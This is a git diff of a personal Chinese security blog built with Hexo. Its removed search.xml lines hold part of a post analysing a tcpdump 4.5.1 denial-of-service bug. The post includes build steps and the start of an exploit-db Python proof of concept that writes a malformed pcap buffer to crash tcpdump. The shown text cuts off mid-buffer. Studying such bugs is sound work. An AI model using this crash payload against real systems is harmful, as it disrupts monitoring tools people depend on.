+    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
+      <div class="header-inner"><div class="site-brand-wrapper">
+  <div class="site-meta ">
+    
+
+    <div class="custom-logo-site-title">
+      <a href="/" class="brand" rel="start">
+        <span class="logo-line-before"><i></i></span>
+        <span class="site-title">混元霹雳手</span>
+        <span class="logo-line-after"><i></i></span>
+      </a>
+    </div>
+      
+        <p class="site-subtitle"></p>
+      
+  </div>
+
+  <div class="site-nav-toggle">
+    <button>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+    </button>
+  </div>
+</div>
+
+<nav class="site-nav">
+  
+
+  
+    <ul id="menu" class="menu">
+      
+        
+        <li class="menu-item menu-item-home">
+          <a href="/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
+            
+            首页
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-about">
+          <a href="/about/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
+            
+            关于
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-tags">
+          <a href="/tags/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
+            
+            标签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-categories">
+          <a href="/categories/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
+            
+            分类
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-archives">
+          <a href="/archives/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
+            
+            归档
+          </a>
+        </li>
+      
+
+      
+        <li class="menu-item menu-item-search">
+          
+            <a href="javascript:;" class="popup-trigger">
+          
+            
+              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
+            
+            搜索
+          </a>
+        </li>
+      
+    </ul>
+  
+
+  
+    <div class="site-search">
+      
+  <div class="popup search-popup local-search-popup">
+  <div class="local-search-header clearfix">
+    <span class="search-icon">
+      <i class="fa fa-search"></i>
+    </span>
+    <span class="popup-btn-close">
+      <i class="fa fa-times-circle"></i>
+    </span>
+    <div class="local-search-input-wrapper">
+      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
+    </div>
+  </div>
+  <div id="local-search-result"></div>
+</div>
+
+
+
+    </div>
+  
+</nav>
+
+
+
+ </div>
+    </header>
+
+    <main id="main" class="main">
+      <div class="main-inner">
+        <div class="content-wrap">
+          <div id="content" class="content">
+            
+
+  
+  
+  
+  <div class="post-block category">
+
+    <div id="posts" class="posts-collapse">
+      <div class="collection-title">
+        <h1>二进制漏洞<small>分类</small>
+        </h1>
+      </div>
+
+      
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2019/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2019-12-25T12:26:05+08:00" content="2019-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+    </div>
+
+  </div>
+  
+  
+  
+
+  
+
+
+
+          </div>
+          
+
+
+          
+
+        </div>
+        
+          
+  
+  <div class="sidebar-toggle">
+    <div class="sidebar-toggle-line-wrap">
+      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
+    </div>
+  </div>
+
+  <aside id="sidebar" class="sidebar">
+    
+    <div class="sidebar-inner">
+
+      
+
+      
+
+      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
+        <div class="site-overview">
+          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
+            
+              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
+            
+              <p class="site-author-name" itemprop="name">Cool-Y</p>
+              <p class="site-description motion-element" itemprop="description"></p>
+          </div>
+
+          <nav class="site-state motion-element">
+
+            
+              <div class="site-state-item site-state-posts">
+              
+                <a href="/archives/">
+              
+                  <span class="site-state-item-count">7</span>
+                  <span class="site-state-item-name">日志</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-categories">
+                <a href="/categories/index.html">
+                  <span class="site-state-item-count">5</span>
+                  <span class="site-state-item-name">分类</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-tags">
+                <a href="/tags/index.html">
+                  <span class="site-state-item-count">16</span>
+                  <span class="site-state-item-name">标签</span>
+                </a>
+              </div>
+            
+
+          </nav>
+
+          
+
+          
+            <div class="links-of-author motion-element">
+                
+                  <span class="links-of-author-item">
+                    <a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
+                      
+                        <i class="fa fa-fw fa-github"></i>GitHub</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="http://weibo.com/HanYanOpenFire" target="_blank" title="Weibo">
+                      
+                        <i class="fa fa-fw fa-weibo"></i>Weibo</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
+                      
+                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
+                      
+                        <i class="fa fa-fw fa-instagram"></i>Instagram</a>
+                  </span>
+                
+            </div>
+          
+
+          
+          
+
+          
+          
+
+          
+
+        </div>
+      </section>
+
+      
+
+      
+
+    </div>
+  </aside>
+
+
+        
+      </div>
+    </main>
+
+    <footer id="footer" class="footer">
+      <div class="footer-inner">
+        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
+  <span class="with-love">
+    <i class="fa fa-user"></i>
+  </span>
+  <span class="author" itemprop="copyrightHolder">Cool-Y</span>
+
+  
+    <span class="post-meta-divider">|</span>
+    <span class="post-meta-item-icon">
+      <i class="fa fa-area-chart"></i>
+    </span>
+    
+    <span title="Site words total count">11.1k</span>
+  
+</div>
+
+
+  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
+
+
+
+
+
+
+
+
+        
+<div class="busuanzi-count">
+    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
+
+  
+    <span class="site-uv">
+      <i class="fa fa-user"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
+      
+    </span>
+  
+
+  
+    <span class="site-pv">
+      <i class="fa fa-eye"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
+      
+    </span>
+  
+</div>
+
+
+
+
+
+
+
+
+        
+      </div>
+    </footer>
+
+    
+      <div class="back-to-top">
+        <i class="fa fa-arrow-up"></i>
+        
+      </div>
+    
+
+    
+
+  </div>
+
+  
+
+<script type="text/javascript">
+  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
+    window.Promise = null;
+  }
+</script>
+
+
+
+
+
+
+
+
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
+  
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
+
+
+
+  
+  
+
+
+  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
+
+
+
+  
+
+  
+
+
+  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  
+
+
+
+
+	
+
+
+
+
+
+  
+
+
+
+
+
+  
+
+
+
+
+
+
+
+<!-- LOCAL: You can save these files to your site and update links -->
+    
+        
+        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
+        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
+    
+<!-- END LOCAL -->
+
+    
+
+    
+
+
+
+
+
+
+
+  
+
+  <script type="text/javascript">
+    // Popup Window;
+    var isfetched = false;
+    var isXml = true;
+    // Search DB path;
+    var search_path = "search.xml";
+    if (search_path.length === 0) {
+      search_path = "search.xml";
+    } else if (/json$/i.test(search_path)) {
+      isXml = false;
+    }
+    var path = "/" + search_path;
+    // monitor main search box;
+
+    var onPopupClose = function (e) {
+      $('.popup').hide();
+      $('#local-search-input').val('');
+      $('.search-result-list').remove();
+      $('#no-result').remove();
+      $(".local-search-pop-overlay").remove();
+      $('body').css('overflow', '');
+    }
+
+    function proceedsearch() {
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
+        .css('overflow', 'hidden');
+      $('.search-popup-overlay').click(onPopupClose);
+      $('.popup').toggle();
+      var $localSearchInput = $('#local-search-input');
+      $localSearchInput.attr("autocapitalize", "none");
+      $localSearchInput.attr("autocorrect", "off");
+      $localSearchInput.focus();
+    }
+
+    // search function;
+    var searchFunc = function(path, search_id, content_id) {
+      'use strict';
+
+      // start loading animation
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
+          '<div id="search-loading-icon">' +
+          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
+          '</div>' +
+          '</div>')
+        .css('overflow', 'hidden');
+      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
+
+      $.ajax({
+        url: path,
+        dataType: isXml ? "xml" : "json",
+        async: true,
+        success: function(res) {
+          // get the contents from search data
+          isfetched = true;
+          $('.popup').detach().appendTo('.header-inner');
+          var datas = isXml ? $("entry", res).map(function() {
+            return {
+              title: $("title", this).text(),
+              content: $("content",this).text(),
+              url: $("url" , this).text()
+            };
+          }).get() : res;
+          var input = document.getElementById(search_id);
+          var resultContent = document.getElementById(content_id);
+          var inputEventFunction = function() {
+            var searchText = input.value.trim().toLowerCase();
+            var keywords = searchText.split(/[\s\-]+/);
+            if (keywords.length > 1) {
+              keywords.push(searchText);
+            }
+            var resultItems = [];
+            if (searchText.length > 0) {
+              // perform local searching
+              datas.forEach(function(data) {
+                var isMatch = false;
+                var hitCount = 0;
+                var searchTextCount = 0;
+                var title = data.title.trim();
+                var titleInLowerCase = title.toLowerCase();
+                var content = data.content.trim().replace(/<[^>]+>/g,"");
+                var contentInLowerCase = content.toLowerCase();
+                var articleUrl = decodeURIComponent(data.url);
+                var indexOfTitle = [];
+                var indexOfContent = [];
+                // only match articles with not empty titles
+                if(title != '') {
+                  keywords.forEach(function(keyword) {
+                    function getIndexByWord(word, text, caseSensitive) {
+                      var wordLen = word.length;
+                      if (wordLen === 0) {
+                        return [];
+                      }
+                      var startPosition = 0, position = [], index = [];
+                      if (!caseSensitive) {
+                        text = text.toLowerCase();
+                        word = word.toLowerCase();
+                      }
+                      while ((position = text.indexOf(word, startPosition)) > -1) {
+                        index.push({position: position, word: word});
+                        startPosition = position + wordLen;
+                      }
+                      return index;
+                    }
+
+                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
+                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
+                  });
+                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
+                    isMatch = true;
+                    hitCount = indexOfTitle.length + indexOfContent.length;
+                  }
+                }
+
+                // show search results
+
+                if (isMatch) {
+                  // sort index by position of keyword
+
+                  [indexOfTitle, indexOfContent].forEach(function (index) {
+                    index.sort(function (itemLeft, itemRight) {
+                      if (itemRight.position !== itemLeft.position) {
+                        return itemRight.position - itemLeft.position;
+                      } else {
+                        return itemLeft.word.length - itemRight.word.length;
+                      }
+                    });
+                  });
+
+                  // merge hits into slices
+
+                  function mergeIntoSlice(text, start, end, index) {
+                    var item = index[index.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    var hits = [];
+                    var searchTextCountInSlice = 0;
+                    while (position + word.length <= end && index.length != 0) {
+                      if (word === searchText) {
+                        searchTextCountInSlice++;
+                      }
+                      hits.push({position: position, length: word.length});
+                      var wordEnd = position + word.length;
+
+                      // move to next position of hit
+
+                      index.pop();
+                      while (index.length != 0) {
+                        item = index[index.length - 1];
+                        position = item.position;
+                        word = item.word;
+                        if (wordEnd > position) {
+                          index.pop();
+                        } else {
+                          break;
+                        }
+                      }
+                    }
+                    searchTextCount += searchTextCountInSlice;
+                    return {
+                      hits: hits,
+                      start: start,
+                      end: end,
+                      searchTextCount: searchTextCountInSlice
+                    };
+                  }
+
+                  var slicesOfTitle = [];
+                  if (indexOfTitle.length != 0) {
+                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
+                  }
+
+                  var slicesOfContent = [];
+                  while (indexOfContent.length != 0) {
+                    var item = indexOfContent[indexOfContent.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    // cut out 100 characters
+                    var start = position - 20;
+                    var end = position + 80;
+                    if(start < 0){
+                      start = 0;
+                    }
+                    if (end < position + word.length) {
+                      end = position + word.length;
+                    }
+                    if(end > content.length){
+                      end = content.length;
+                    }
+                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
+                  }
+
+                  // sort slices in content by search text's count and hits' count
+
+                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
+                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
+                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
+                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
+                      return sliceRight.hits.length - sliceLeft.hits.length;
+                    } else {
+                      return sliceLeft.start - sliceRight.start;
+                    }
+                  });
+
+                  // select top N slices in content
+
+                  var upperBound = parseInt('1');
+                  if (upperBound >= 0) {
+                    slicesOfContent = slicesOfContent.slice(0, upperBound);
+                  }
+
+                  // highlight title and content
+
+                  function highlightKeyword(text, slice) {
+                    var result = '';
+                    var prevEnd = slice.start;
+                    slice.hits.forEach(function (hit) {
+                      result += text.substring(prevEnd, hit.position);
+                      var end = hit.position + hit.length;
+                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
+                      prevEnd = end;
+                    });
+                    result += text.substring(prevEnd, slice.end);
+                    return result;
+                  }
+
+                  var resultItem = '';
+
+                  if (slicesOfTitle.length != 0) {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
+                  } else {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
+                  }
+
+                  slicesOfContent.forEach(function (slice) {
+                    resultItem += "<a href='" + articleUrl + "'>" +
+                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
+                      "...</p>" + "</a>";
+                  });
+
+                  resultItem += "</li>";
+                  resultItems.push({
+                    item: resultItem,
+                    searchTextCount: searchTextCount,
+                    hitCount: hitCount,
+                    id: resultItems.length
+                  });
+                }
+              })
+            };
+            if (keywords.length === 1 && keywords[0] === "") {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
+            } else if (resultItems.length === 0) {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
+            } else {
+              resultItems.sort(function (resultLeft, resultRight) {
+                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
+                  return resultRight.searchTextCount - resultLeft.searchTextCount;
+                } else if (resultLeft.hitCount !== resultRight.hitCount) {
+                  return resultRight.hitCount - resultLeft.hitCount;
+                } else {
+                  return resultRight.id - resultLeft.id;
+                }
+              });
+              var searchResultList = '<ul class=\"search-result-list\">';
+              resultItems.forEach(function (result) {
+                searchResultList += result.item;
+              })
+              searchResultList += "</ul>";
+              resultContent.innerHTML = searchResultList;
+            }
+          }
+
+          if ('auto' === 'auto') {
+            input.addEventListener('input', inputEventFunction);
+          } else {
+            $('.search-icon').click(inputEventFunction);
+            input.addEventListener('keypress', function (event) {
+              if (event.keyCode === 13) {
+                inputEventFunction();
+              }
+            });
+          }
+
+          // remove loading animation
+          $(".local-search-pop-overlay").remove();
+          $('body').css('overflow', '');
+
+          proceedsearch();
+        }
+      });
+    }
+
+    // handle and trigger popup window;
+    $('.popup-trigger').click(function(e) {
+      e.stopPropagation();
+      if (isfetched === false) {
+        searchFunc(path, 'local-search-input', 'local-search-result');
+      } else {
+        proceedsearch();
+      };
+    });
+
+    $('.popup-btn-close').click(onPopupClose);
+    $('.popup').click(function(e){
+      e.stopPropagation();
+    });
+    $(document).on('keyup', function (event) {
+      var shouldDismissSearchPopup = event.which === 27 &&
+        $('.search-popup').is(':visible');
+      if (shouldDismissSearchPopup) {
+        onPopupClose();
+      }
+    });
+  </script>
+
+
+
+
+
+  
+
+  
+  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
+  <script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
+  <script>
+    function showTime(Counter) {
+      var query = new AV.Query(Counter);
+      var entries = [];
+      var $visitors = $(".leancloud_visitors");
+
+      $visitors.each(function () {
+        entries.push( $(this).attr("id").trim() );
+      });
+
+      query.containedIn('url', entries);
+      query.find()
+        .done(function (results) {
+          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
+
+          if (results.length === 0) {
+            $visitors.find(COUNT_CONTAINER_REF).text(0);
+            return;
+          }
+
+          for (var i = 0; i < results.length; i++) {
+            var item = results[i];
+            var url = item.get('url');
+            var time = item.get('time');
+            var element = document.getElementById(url);
+
+            $(element).find(COUNT_CONTAINER_REF).text(time);
+          }
+          for(var i = 0; i < entries.length; i++) {
+            var url = entries[i];
+            var element = document.getElementById(url);
+            var countSpan = $(element).find(COUNT_CONTAINER_REF);
+            if( countSpan.text() == '') {
+              countSpan.text(0);
+            }
+          }
+        })
+        .fail(function (object, error) {
+          console.log("Error: " + error.code + " " + error.message);
+        });
+    }
+
+    function addCount(Counter) {
+      var $visitors = $(".leancloud_visitors");
+      var url = $visitors.attr('id').trim();
+      var title = $visitors.attr('data-flag-title').trim();
+      var query = new AV.Query(Counter);
+
+      query.equalTo("url", url);
+      query.find({
+        success: function(results) {
+          if (results.length > 0) {
+            var counter = results[0];
+            counter.fetchWhenSave(true);
+            counter.increment("time");
+            counter.save(null, {
+              success: function(counter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(counter.get('time'));
+              },
+              error: function(counter, error) {
+                console.log('Failed to save Visitor num, with error message: ' + error.message);
+              }
+            });
+          } else {
+            var newcounter = new Counter();
+            /* Set ACL */
+            var acl = new AV.ACL();
+            acl.setPublicReadAccess(true);
+            acl.setPublicWriteAccess(true);
+            newcounter.setACL(acl);
+            /* End Set ACL */
+            newcounter.set("title", title);
+            newcounter.set("url", url);
+            newcounter.set("time", 1);
+            newcounter.save(null, {
+              success: function(newcounter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
+              },
+              error: function(newcounter, error) {
+                console.log('Failed to create');
+              }
+            });
+          }
+        },
+        error: function(error) {
+          console.log('Error:' + error.code + " " + error.message);
+        }
+      });
+    }
+
+    $(function() {
+      var Counter = AV.Object.extend("Counter");
+      if ($('.leancloud_visitors').length == 1) {
+        addCount(Counter);
+      } else if ($('.post-title-link').length > 1) {
+        showTime(Counter);
+      }
+    });
+  </script>
+
+
+
+  
+
+  
+
+  
+  
+
+  
+
+  
+
+  
+
+</body>
+</html>
diff --git a/categories/加密解密/index.html b/categories/加密解密/index.html
index ae36da16..d79850c3 100644
--- a/categories/加密解密/index.html
+++ b/categories/加密解密/index.html
@@ -379,7 +379,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -390,7 +390,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/categories/理论学习/index.html b/categories/理论学习/index.html
index 40b0a72e..9da1cdd0 100644
--- a/categories/理论学习/index.html
+++ b/categories/理论学习/index.html
@@ -379,7 +379,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -390,7 +390,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/categories/顶会论文/index.html b/categories/顶会论文/index.html
index 688fd6f5..a52dcdde 100644
--- a/categories/顶会论文/index.html
+++ b/categories/顶会论文/index.html
@@ -405,7 +405,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -416,7 +416,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/index.html b/index.html
index d8b1ac52..26bf606c 100644
--- a/index.html
+++ b/index.html
@@ -333,6 +333,28 @@
           </span>
 
           
+            <span class="post-category">
+            
+              <span class="post-meta-divider">|</span>
+            
+              <span class="post-meta-item-icon">
+                <i class="fa fa-folder-o"></i>
+              </span>
+              
+                <span class="post-meta-item-text">分类于</span>
+              
+              
+                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
+                  <a href="/categories/二进制漏洞/" itemprop="url" rel="index">
+                    <span itemprop="name">二进制漏洞</span>
+                  </a>
+                </span>
+
+                
+                
+              
+            </span>
+          
 
           
             
@@ -1614,7 +1636,7 @@ tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -1625,7 +1647,7 @@ tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/search.xml b/search.xml
index de3a09f4..59b90eac 100644
--- a/search.xml
+++ b/search.xml
@@ -1,176 +1,84 @@
 <?xml version="1.0" encoding="utf-8"?>
-<search> 
-  
-  
-    
-    <entry>
-      <title>TCPDUMP拒绝服务攻击漏洞</title>
-      <link href="/2019/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/"/>
-      <url>/2019/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</url>
-      
-        <content type="html"><![CDATA[<h1 id="TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><a href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class="headerlink" title="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析"></a>TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</h1><h2 id="一、Tcpdump介绍"><a href="#一、Tcpdump介绍" class="headerlink" title="一、Tcpdump介绍"></a>一、Tcpdump介绍</h2><ol><li>tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump；它需要WinPcap驱动，相当于在Linux平台下的libpcap.</li><li>tcpdump能够分析网络行为，性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息，从而使用户能够进一步找出问题的根源。</li><li>也可以使用 tcpdump 的实现特定目的，例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量，如Telnet或HTTP的数据包，查看登录的用户名、密码、网址、正在浏览的网站内容，或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁，而是对网络上的其他计算机的安全存在威胁。</li></ol><h2 id="二、分析环境"><a href="#二、分析环境" class="headerlink" title="二、分析环境"></a>二、分析环境</h2><p>Ubuntu 16.04.4 LTS i686<br>tcpdump 4.5.1<br>gdb with peda</p><h2 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h2><p>这个漏洞触发的原因是，tcpdump在处理特殊的pcap包的时候，由于对数据包传输数据长度没有进行严格的控制，导致在连续读取数据包中内容超过一定长度后，会读取到无效的内存空间，从而导致拒绝服务的发生。对于这个漏洞，首先要对pcap包的结构进行一定的分析，才能够最后分析出漏洞的成因，下面对这个漏洞进行复现。</p><h3 id="1-编译安装tcpdump"><a href="#1-编译安装tcpdump" class="headerlink" title="1.编译安装tcpdump"></a>1.编译安装tcpdump</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.# apt-get install libpcap-dev</span><br><span class="line">2.# dpkg -l libpcap-dev</span><br><span class="line">3.# wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">4.# tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">5.# cd tcpdump-4.5.1/</span><br><span class="line">6.# ./configure</span><br><span class="line">7.# make</span><br><span class="line">8.# make install</span><br><span class="line">9.# tcpdump –-version</span><br><span class="line">          tcpdump version 4.5.1</span><br><span class="line">          libpcap version 1.7.4</span><br></pre></td></tr></table></figure><h3 id="2-生成payload（来自exploit-db-payload）"><a href="#2-生成payload（来自exploit-db-payload）" class="headerlink" title="2.生成payload（来自exploit-db payload）"></a>2.生成payload（来自exploit-db payload）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: tcpdump 4.5.1 Access Violation Crash</span><br><span class="line"># Date: 31st May 2016</span><br><span class="line"># Exploit Author: David Silveiro</span><br><span class="line"># Vendor Homepage: http://www.tcpdump.org</span><br><span class="line"># Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz</span><br><span class="line"># Version: 4.5.1</span><br><span class="line"># Tested on: Ubuntu 14 LTS</span><br><span class="line">from subprocess import call</span><br><span class="line">from shlex import split</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">def crash():</span><br><span class="line">    command = &apos;tcpdump -r crash&apos;</span><br><span class="line">    buffer     =   &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos;</span><br><span class="line">    buffer     +=  &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot;</span><br><span class="line">    